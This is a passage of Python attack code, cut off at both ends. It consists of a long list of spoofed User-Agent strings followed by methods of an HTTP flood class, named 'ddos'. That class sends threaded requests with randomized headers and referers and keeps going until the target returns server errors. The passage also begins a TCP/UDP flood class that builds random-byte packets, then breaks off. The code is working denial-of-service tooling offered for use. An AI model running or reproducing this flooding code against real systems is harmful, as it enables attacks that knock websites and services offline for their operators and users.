Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', 'Links (2.1pre15; FreeBSD 5.4-STABLE i386; 158x58)', 'Wget/1.8.2', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0', 'Mediapartners-Google/2.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007 Firebird/0.7', 'Mozilla/4.04 [en] (WinNT; I)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060205 Galeon/2.0.0 (Debian package 2.0.0-2)', 'lwp-trivial/1.41', 'NetBSD-ftp/20031210', 'Dillo/0.8.5-i18n-misc', 'Links (2.1pre20; NetBSD 2.1_STABLE i386; 145x54)', 'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Lynx/2.8.5rel.3 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Links (2.1pre19; NetBSD 2.1_STABLE sparc64; 145x54)', 'Lynx/2.8.6dev.15 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Links (2.1pre14; IRIX64 6.5 IP27; 145x54)', 'Wget/1.10.1', 'ELinks/0.10.5 (textmode; FreeBSD 4.11-STABLE i386; 80x22-2)', 'Links (2.1pre20; FreeBSD 4.11-STABLE i386; 80x22)', 'Lynx/2.8.5rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d-p1', 'Opera/8.52 (X11; Linux i386; U; de)', 'Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8.0.1) Gecko/20060310 Firefox/1.5.0.1', 'Mozilla/5.0 (X11; U; IRIX64 IP27; en-US; rv:1.4) Gecko/20030711', 'Mozilla/4.8 [en] (X11; U; IRIX64 6.5 IP27)', 'Mozilla/4.76 [en] (X11; U; SunOS 5.8 sun4m)', 'Opera/5.0 (SunOS 5.8 sun4m; U) [en]', 'Links (2.1pre15; SunOS 5.8 sun4m; 80x24)', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Wget/1.8.1', 'Wget/1.9.1', 'tnftp/20050625', 'Links (1.00pre12; Linux 2.6.14.2.20051115 i686; 80x24) (Debian pkg 0.99+1.00pre12-1)', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.0.16', 'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7) Gecko/20051122', 'Wget/1.7', 'Lynx/2.8.2rel.1 libwww-FM/2.14', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; de) Opera 8.53', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7e', 'Links (2.1pre20; SunOS 5.10 sun4u; 80x22)', 'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7i', 'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8) Gecko/20060202 Firefox/1.5', 'Opera/8.51 (X11; Linux i386; U; de)', 'Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i386--freebsd; X11)', 'Links (0.96; OpenBSD 3.0 sparc)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c', 'Lynx/2.8.3rel.1 libwww-FM/2.14', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)', 'libwww-perl/5.79', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.12) Gecko/20050919 Firefox/1.0.7', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)', 'msnbot/1.0 (+http://search.msn.com/msnbot.htm)', 'Googlebot/2.1 (+http://www.google.com/bot.html)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051008 Firefox/1.0.7', 'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51', 'Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.3 (like Gecko)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7c', 'Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/4.8 [en] (Windows NT 5.1; U)', 'Opera/8.51 (Windows NT 5.1; U; en)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Opera/8.51 (Windows NT 5.1; U; en;VWP-online.de)', 'sproose/0.1-alpha (sproose crawler; http://www.sproose.com/bot.html; crawler@sproose.com)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0,gzip(gfe) (via translate.google.com)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'BrowserEmulator/0.9 see http://dejavu.org', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.4) Gecko/20030624', 'iCCrawler (http://www.iccenter.net/bot.htm)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)', 'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8) Gecko/20051111 Firefox/1.5', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.50', 'Mozilla/3.0 (x86 [de] Windows NT 5.0; Sun)', 'Java/1.4.1_04', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5', 'msnbot/0.9 (+http://search.msn.com/msnbot.htm)', 'NutchCVS/0.8-dev (Nutch running at UW; http://www.nutch.org/docs/en/bot.html; sycrawl@cs.washington.edu)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-14.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.53', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.4) Gecko/20030619 Netscape/7.1 (ax)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)', 'Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)', 'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)', 'Mozilla/4.0 (compatible; MSIE 5.5; AOL 7.0; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)', 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)', 'Opera/8.53 (Windows NT 5.1; U; en)', 'Opera/8.01 (Windows NT 5.0; U; de)', 'Opera/8.54 (Windows NT 5.1; U; de)', 'Opera/8.53 (Windows NT 5.0; U; en)', 'Opera/8.01 (Windows NT 5.1; U; de)', 'Opera/8.50 (Windows NT 5.1; U; de)', 'Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322', 'Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)', 'Mozilla/4.0 (compatible; Cerberian Drtrs Version-3.2-Build-0)', 'Mozilla/4.0 (compatible; AvantGo 6.0; FreeBSD)', 'Mozilla/4.5 [de] (Macintosh; I; PPC)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA; MPLUS)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {59FC8AE0-2D88-C929-DA8D-B559D01826E7}; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; snprtz|S04741035500914#914|isdn; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EnergyPlugIn; dial)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.02b)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; .NET CLR 1.0.3705)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; .NET CLR 1.0.3705)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ringo; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322; yplus 4.1.00b)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; YPC 3.2.0)', 'Mozilla/4.0 (compatible; MSIE 6.0; AOL 7.0; Windows NT 5.1; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; BUILDWARE 1.6; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; HbTools 4.7.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; (R1 1.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; it)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; FunWebProducts; HbTools 4.7.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; en)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312469)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; SV1; FDM)', 'Mozilla/5.0 (Macintosh; U; PPC; de-DE; rv:1.0.2)', 'Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1)', 'Mozilla/5.0 (compatible; Konqueror/3.4; Linux 2.6.14-kanotix-9; X11)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Win98; de; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6)', 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; de; rv:1.8.0.1)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.1)', 'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.3)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.12)', 'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1)', 'Mozilla/5.0 (X11; Linux i686; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.6)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.1)', 'Mozilla/5.0 (compatible; Konqueror/3; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)', 'Mozilla/5.0 (compatible; Konqueror/3.2; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tg)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51'] return user_agents def stop_atk(self): self.stopatk = True def build_querystr(self, value): result = '' for i in range(value): item = random.randint(65, 100) result += chr(item) return result def ddos(self): code = 0 if not self.stopatk: try: agent = random.choice(self.useragents) req = urllib.request.Request(self.ip, headers={'User-Agent': agent, 'Referer': random.choice( self.referers) + self.build_querystr( random.randint(50, 100)), 'Cache-Control': 'no-cache', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive': random.randint(110, 160), 'Connection': 'keep-alive'}) urllib.request.urlopen(req) code = 200 except urllib.error.HTTPError as e: code_split = str(e).split() code = code_split[2] code = str(code[0] + code[1] + code[2]) if "500" in str(e): code = 500 elif "429" in str(e): code = 500 elif code.startswith('5'): code = 500 except urllib.error.URLError as e: if "A connection attempt failed" in str(e): code = 500 except: pass return code def start_thr(self): while True: try: x = threading.Thread(target=self.ddos) x.start() time.sleep(self.delay) if self.stopatk: break except: pass def ddos_start(self): while True: try: http_code = self.ddos() if http_code == 500: break if self.stopatk: break except: pass class TCP_UDP_Flood: def __init__(self, ip, port, delay, pkt_size): self.ip = ip self.port = int(port) self.delay = float(delay) self.pkt_size = int(pkt_size) self.stop = False def gen_packet(self, size): return random._urandom(size) def UDP_Req(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 